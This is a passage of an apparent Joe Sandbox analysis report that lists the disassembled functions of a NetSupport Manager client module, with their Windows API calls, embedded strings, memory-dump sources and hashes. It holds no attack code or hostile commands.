                                                                                      • Opcode Fuzzy Hash: b8f593f3550aa9e0f779f3b8c62ca3ee8f9d3103c1fcafdad78b4b8c3047e15f
                                                                                      • Instruction Fuzzy Hash: D69128B5E002599FDB54DFA8CCC4ADDF7B9FB88314F608169E519AB280EB70A941CB50
                                                                                      Function 1102B1D0 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                      • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                      • _fgets.LIBCMT ref: 1102B3C0
                                                                                      • _strtok.LIBCMT ref: 1102B3E8
                                                                                        • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                      • _fgets.LIBCMT ref: 1102B424
                                                                                      • _strtok.LIBCMT ref: 1102B438
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                      • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 78526175-1484737611
                                                                                      • Opcode ID: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction ID: 83a04ffa2f5f23a923324f4189043cfd8b751997b231b4d3af7dc0cd534076c2
                                                                                      • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                      • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                      Function 11031160 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 245sleepwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,4012B9B4,00000000,00000000,00000000), ref: 1103119A
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                      • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                      • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                        • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                        • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                        • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                        • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                        • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                      • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                      • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                      • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                      • API String ID: 3887438110-1852639040
                                                                                      • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                      • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                      • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                      Function 110B3520 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,4012B9B4,111F00F8,111E5C98,?), ref: 110B3594
                                                                                      • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                      • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                      • API String ID: 3518726166-774679399
                                                                                      • Opcode ID: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                      • Instruction ID: 5c973c881439576bbc97280a0c87cfab299b34d5c0027cf4f030de1918296fe0
                                                                                      • Opcode Fuzzy Hash: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                      • Instruction Fuzzy Hash: E5911778E04219AFDB54CFA5C980BADFBF1FB48704F20816AE815AB380D735A941CF58
                                                                                      Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                        • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                        • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                      • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                      • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                      • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                      • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                      • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                      • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                      • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                      • String ID: AddToJournal$Chat
                                                                                      • API String ID: 693070851-2976406578
                                                                                      • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                      • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                      • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                      Function 11027270 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                      • PostMessageA.USER32(0002046E,00000501,00000000,00000000), ref: 11027340
                                                                                      • SetEvent.KERNEL32(0000027C), ref: 11027351
                                                                                      • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                      • PostMessageA.USER32(0002046E,00000800,00000000,00000000), ref: 1102738E
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                      • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                      • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                      • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                      • CloseHandle.KERNEL32(000003F8), ref: 11027415
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                      • String ID: Async
                                                                                      • API String ID: 3276504616-2933828738
                                                                                      • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                      • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                      • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                      • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                      Function 11105340 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 1110534D
                                                                                      • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                      • GetTickCount.KERNEL32 ref: 1110535C
                                                                                      • GetTickCount.KERNEL32 ref: 1110538E
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                      • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                      • GetTickCount.KERNEL32 ref: 111053EC
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                      • API String ID: 831250470-625438208
                                                                                      • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                      • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                      • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                      Function 1100D200 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                      • API String ID: 2111968516-2092292787
                                                                                      • Opcode ID: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                      • Instruction ID: d9a7d6ebd96fccb3ef7d6a30ae0c52648c54e2eaa592bb8290d406d227b44d1e
                                                                                      • Opcode Fuzzy Hash: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                      • Instruction Fuzzy Hash: B7F0623269520C47BA8087EC784053EF78D739217D7C88093F4ACFAF20E916DCA0A1A9
                                                                                      Function 11137340 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                      • _memset.LIBCMT ref: 111373D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc$Version_memset
                                                                                      • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                      • API String ID: 1659045089-3162170060
                                                                                      • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                      • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                      • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                      Function 110390F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                      • _memset.LIBCMT ref: 11039131
                                                                                      • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                      • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                      • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                      • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                      • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                      • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                        • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                        • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
